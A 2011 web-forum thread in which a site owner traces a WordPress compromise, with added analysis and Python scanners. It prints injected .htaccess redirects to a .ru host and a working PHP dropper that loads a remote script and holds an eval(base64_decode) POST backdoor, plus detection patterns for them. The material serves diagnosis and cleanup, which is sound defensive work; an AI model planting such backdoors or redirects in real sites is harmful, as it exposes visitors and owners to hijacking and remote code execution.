Andrea Posted November 10, 2011

Apparently, at some point I signed my site (see my footer link) up for some SiteLock alert, and yesterday I received a warning email:

> We have detected a critical malware vulnerability at your site aandbwebdesign.com. This must be corrected within 72 hours in order to maintain your certification and continue to display the SiteLock security badge. Please access your SiteLock dashboard for more details. From your dashboard, you can also take advantage of our Expert Services team to help you correct this issue.

Some of the issues were related to a straggler folder that I just deleted, but one warning remains, and I cannot find the source of the issue:

> Page: http://www.aandbwebdesign.com?=Search&s=1
> Malware link: http://largeprovider.ru/evoce/index.php?=Search&s=1
> Malware reported by: Advisory provided by Google
> If the link labeled "Malware Link" above is a link to an external website (not under your control), you should remove this link as it will send your visitors to a known malware site. If the link is on your site, though, you will need to apply to be removed from Google's malware list. You may also click here to get help from our expert services team.

But I cannot find the issue here - the link isn't really helpful (to me) - how can I find this Russian intruder in my files?
Andrea Posted November 10, 2011

I'm stuck - somehow, laboratory-security.ru has attached itself to my site, and I can't find where they are hiding. Most of the site works fine, but when I hover over 'Blog', I see that link pop up. When I log into my WordPress admin and try to edit search.php, I get the "reported attack page" warning. But when I open search.php via Dreamweaver, I see nothing out of the ordinary. I have even copied all the files to my desktop and run a Dreamweaver search for "laboratory" - and nothing comes up. Any hints, anyone?
falkencreative Posted November 10, 2011

It's probably some sort of JavaScript-based attack. Have you checked for suspicious JavaScript includes in your main "index.php" file in the root of your site? I'm not seeing anything suspicious that I can spot, though.
Andrea Posted November 10, 2011

I looked for JavaScripts, but so far haven't found any that look bad. I assume that URL should be in one of those files, but Dreamweaver didn't find anything. What is odd is that at home this AM, when I hovered over 'Blog' in the nav bar, I saw the bad URL appear in the bottom left, and when I clicked Blog, it loaded the page without CSS. Now, here at work, I don't have either of these events occurring. Too weird.
newseed Posted November 10, 2011

> I looked for JavaScripts, but so far haven't found any that look bad. I assume that URL should be in one of those files, but Dreamweaver didn't find anything. What is odd is that at home this AM, when I hovered over 'Blog' in the nav bar, I saw the bad URL appear in the bottom left, and when I clicked Blog, it loaded the page without CSS. Now, here at work, I don't have either of these events occurring. Too weird.

I don't suppose this would have something to do with the wp-admin folder files, because (and I am assuming here) you probably don't log in to your site at work but you do at home.
Andrea Posted November 10, 2011

I don't know - I noticed that URL when I viewed the site in the browser, but I was logged into admin in another tab.... What I also don't understand is that the compromised link that alert gave me is related to the search function - and it's search.php that gets blocked when I try to open it via wp-admin. But when I open it via Dreamweaver, I see nothing suspicious. Of course, I could pay that alert site $60 for help with this problem, but I really don't want to.
newseed Posted November 10, 2011

If you didn't do any customization in the wp-admin files such as search.php, then why don't you just re-upload the original file(s) and see what happens?
Andrea Posted November 10, 2011

Good point - I'll do that. At least it'll rule those out and maybe even fix the issue.
Andrea Posted November 11, 2011

I found it! Those dirty, rotten sons of bitches!!!! They put it in my .htaccess. But I'm not totally sure what all to delete:

---

Actually, I'm taking it all out. Please let me know if part of this actually belongs. Also - how do they get into my .htaccess???

```apache
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

# Injected: an ErrorDocument with a full URL makes Apache redirect the visitor
# there, so every 400/401/403/404/500 lands on the foreign host
ErrorDocument 400 http://spark-plastic.ru/open/index.php
ErrorDocument 401 http://spark-plastic.ru/open/index.php
ErrorDocument 403 http://spark-plastic.ru/open/index.php
ErrorDocument 404 http://spark-plastic.ru/open/index.php
ErrorDocument 500 http://spark-plastic.ru/open/index.php

# Injected: visitors whose Referer matches any of these substrings (search
# engines, social sites, webmail, anything containing "blog" or "mail") get a
# 301 to the foreign host; a visitor who types the address in sees nothing
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://spark-plastic.ru/open/index.php [R=301,L]
</IfModule>
```
falkencreative Posted November 11, 2011

Take out everything after the "# END WordPress" line. Everything before that line is valid and needed by WordPress. I can't really say how they got access... it's possible they got access to the server your site is hosted on, not just your specific account, and added that code to all .htaccess files that they could find.
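The two injected behaviours in Andrea's .htaccess, error pages handed to a foreign host and a Referer-gated 301, can be checked mechanically rather than by eye. The following Python is an added example written for this page; it is not code from any post here or from WordPress. It audits an .htaccess text for both patterns and then applies the "keep only up to # END WordPress" advice. SITE_HOST is an assumption about the audited site, and SAMPLE_HTACCESS is a shortened copy of the dump posted above with only two of the referer conditions.

```python
"""Audit an Apache .htaccess for the hijack pattern quoted in the thread.

Added example, not code from any post. Flags (1) ErrorDocument directives that
point at a foreign host and (2) RewriteRule redirects to a foreign host,
noting whether they are gated on %{HTTP_REFERER}. SITE_HOST is an assumption;
SAMPLE_HTACCESS is a shortened copy of the file posted in the thread.
"""
from urllib.parse import urlparse

SITE_HOST = "www.aandbwebdesign.com"   # assumption: the site being audited

SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
ErrorDocument 404 http://spark-plastic.ru/open/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://spark-plastic.ru/open/index.php [R=301,L]
</IfModule>
"""


def is_foreign(target):
    """True for an absolute http(s) URL whose host is not SITE_HOST.
    Relative targets such as /index.php, or the literal '-', are never foreign."""
    u = urlparse(target)
    return u.scheme in ("http", "https") and u.netloc.lower() not in ("", SITE_HOST)


def audit_htaccess(text):
    """Return (line_number, directive, detail) for every injected-looking directive."""
    findings = []
    referer_conds = []   # RewriteCond %{HTTP_REFERER} patterns awaiting their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "errordocument" and len(parts) >= 3:
            # An ErrorDocument with a full URL makes Apache redirect the client there.
            if is_foreign(parts[2]):
                findings.append((lineno, "ErrorDocument", "%s -> %s" % (parts[1], parts[2])))
        elif directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() == "%{HTTP_REFERER}":
                referer_conds.append(parts[2])
        elif directive == "rewriterule" and len(parts) >= 3:
            if is_foreign(parts[2]):
                gate = ""
                if referer_conds:
                    gate = "gated on referer %s; " % ", ".join(referer_conds)
                findings.append((lineno, "RewriteRule", gate + "redirect -> " + parts[2]))
            referer_conds = []   # RewriteCond lines apply only to the next RewriteRule


    return findings


def keep_wordpress_block(text, marker="# END WordPress"):
    """Keep the file up to and including the marker line; drop everything after it."""
    kept = []
    for raw in text.splitlines():
        kept.append(raw)
        if raw.strip() == marker:
            break
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for lineno, directive, detail in audit_htaccess(SAMPLE_HTACCESS):
        print("line %d: %s %s" % (lineno, directive, detail))
    print(keep_wordpress_block(SAMPLE_HTACCESS))
```

Two things worth knowing when reading the output. A text search of the theme or plugin files for the redirect hostname cannot find this kind of injection, because the hostname lives only in .htaccess, and because the rule is keyed on the Referer header a direct visit never triggers it, which is why a site can look clean to its owner while visitors from search results are redirected. Also, a legitimate ErrorDocument normally points at a local path such as /404.php, which is why the check only flags targets on another host.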
Andrea Posted November 11, 2011

This is getting ridiculous - what in the world is going on. So I come home, ready to put the part back into my .htaccess that I should have left there (thanks, Ben), when I have another email from the SiteLock place about a whole new page that's defective. Click at own risk, but they report: http://www.aandbwebdesign.com/th1s_1s_a_4o4.html

The strange thing is, I do not see this file in any of my online directories. SiteLock reports that the malware link is (again, click at own risk) http://masaskisoft.in/ahalai/index.php - so I'm looking through my files and this seems to be at the top of several files (index.php for example):

```php
<?php
global $sessdt_o;
if(!$sessdt_o) {
    $sessdt_o = 1;
    $sessdt_k = "lb11";                       // name of the tracking cookie
    if(!@$_COOKIE[$sessdt_k]) {
        // first visit from this browser: plant the marker cookie, serve the page untouched
        $sessdt_f = "102";
        if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
        else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
    } else {
        if($_COOKIE[$sessdt_k]=="102") {
            // second visit: overwrite the marker with a random value so this branch never fires again
            $sessdt_f = (rand(1000,9000)+1);
            if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); }
            else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
            // build the remote script URL from the reversed, url-encoded host+path of this request
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
            $sessdt_v = urlencode(strrev($sessdt_j));
            $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200);
            // inject the remote script, refresh back to the same URL, and hide the rest of the page in an HTML comment
            echo "<script src='$sessdt_u'></script>";
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
        }
    }
    // backdoor: a POST parameter named "showimg" is base64-decoded and eval()ed as PHP
    $sessdt_p = "showimg";
    if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}
}
```

I don't really understand it, but I do know that turnitupnow has NOTHING to do with me or my site. What in the world is happening???
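The snippet Andrea pasted combines three things: a cookie gate that only injects on a browser's second visit, a script tag whose URL is assembled at runtime (so searching the files for a hostname finds nothing), and an eval() backdoor driven by a POST parameter. The following Python is an added example written for this page, not code from any post. It scans PHP sources for those three indicators over a constructed file tree, models the lb11 cookie logic so the once-per-browser behaviour can be seen, and reverses the str_replace plus base64_decode step the backdoor applies to its input. DROPPER is condensed from the snippet above; CLEAN, FILES and SAMPLE_PHP are made up.

```python
"""Triage the PHP dropper quoted in the thread.

Added example, not code from any post. scan_php/scan_tree flag the three
behaviours the snippet combines; cookie_gate models the lb11 cookie logic;
decode_backdoor_payload shows what eval() receives. FILES is a constructed
tree: DROPPER is condensed from the snippet above, CLEAN is a made-up theme file.
"""
import base64
import random
import re

INDICATORS = {
    # eval(base64_decode(... $_POST[...])) within one statement: code execution on demand
    "post_eval_backdoor": re.compile(
        r"eval\s*\(\s*base64_decode\s*\([^;]*?\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    # <script src='$var'>: the remote URL is built at runtime, so a text search for a hostname misses it
    "dynamic_remote_script": re.compile(r"<script\s+src=['\"]\$\w+"),
    # meta refresh back to the current request URL, used to hide the injected page
    "self_refresh_cloak": re.compile(r"http-equiv=['\"]refresh['\"][^>]*url=http://\$\w+"),
}

DROPPER = r"""<?php
global $sessdt_o;
if(!$sessdt_o) {
  $sessdt_o = 1; $sessdt_k = "lb11";
  if(!@$_COOKIE[$sessdt_k]) { @setcookie($sessdt_k, "102"); }
  else if($_COOKIE[$sessdt_k]=="102") {
    $sessdt_f = (rand(1000,9000)+1); @setcookie($sessdt_k,$sessdt_f);
    $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
    $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr(urlencode(strrev($sessdt_j)),-200);
    echo "<script src='$sessdt_u'></script>";
    echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
  }
  $sessdt_p = "showimg";
  if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;}
}
"""

CLEAN = r"""<?php
// constructed benign theme code: a static script tag, a base64 data: URI, a settings cookie
echo '<script src="/wp-content/themes/site/js/nav.js"></script>';
function site_inline_png($b64) { return '<img src="data:image/png;base64,' . $b64 . '">'; }
setcookie('site_pref', 'compact', time() + 86400, '/');
"""

FILES = {"index.php": DROPPER, "wp-content/themes/site/functions.php": CLEAN}


def scan_php(source):
    """Sorted names of the indicators present in one PHP source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))


def scan_tree(files):
    """{path: source} -> {path: [indicators]} for files with at least one hit."""
    hits = {}
    for path, src in files.items():
        found = scan_php(src)
        if found:
            hits[path] = found
    return hits


COOKIE_NAME, MARKER = "lb11", "102"


def cookie_gate(cookies, rng):
    """One request through the dropper's gate. Updates the browser's cookie jar the
    way the dropper's setcookie() would; True means this request gets the injection."""
    value = cookies.get(COOKIE_NAME)
    if value is None:
        cookies[COOKIE_NAME] = MARKER                               # visit 1: plant marker, clean page
        return False
    if value == MARKER:
        cookies[COOKIE_NAME] = str(rng.randint(1000, 9000) + 1)    # visit 2: burn the marker (never "102" again)
        return True
    return False                                                    # later visits: clean page


def injected_visits(n):
    """Which of n consecutive visits from one browser see the injected script."""
    cookies, rng = {}, random.Random(0)
    return [i for i in range(1, n + 1) if cookie_gate(cookies, rng)]


def decode_backdoor_payload(post_value):
    """What eval() receives: PHP's form decoding turned '+' into spaces, the dropper's
    str_replace(chr(32), chr(43), ...) puts them back, then base64_decode."""
    return base64.b64decode(post_value.replace(" ", "+"))


SAMPLE_PHP = b"echo 100>0;"   # constructed; chosen so its base64 form contains a '+'
SAMPLE_POST_VALUE = base64.b64encode(SAMPLE_PHP).decode().replace("+", " ")

if __name__ == "__main__":
    print(scan_tree(FILES))
    print("visits that get the injected script:", injected_visits(5))
    print(decode_backdoor_payload(SAMPLE_POST_VALUE))
```

The cookie model is the part worth dwelling on: a given browser sees the injected script exactly once, on its second page load, and from then on the page is served clean, so the same site can look infected in one browser and fine in another. To run the scanner over a real install, read every .php file under the web root with os.walk into the dict scan_tree expects; it matches on behaviour rather than on a hostname, so it also catches copies of the dropper pointed at a different domain.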
falkencreative Posted November 12, 2011

I'm assuming you've already changed all of your hosting-related usernames/passwords? Sounds like this is something you'd better talk to your hosting provider about. Maybe the server you are hosting your site on has security issues?
Andrea Posted November 12, 2011

That's the thing - my computer crashed last weekend and I bought a new one, and in the process of recovering stuff and getting things back, I just changed the password a couple of days ago - and it's a good one. But I'm in chat with the host right now - this is too weird. Thanks for your help.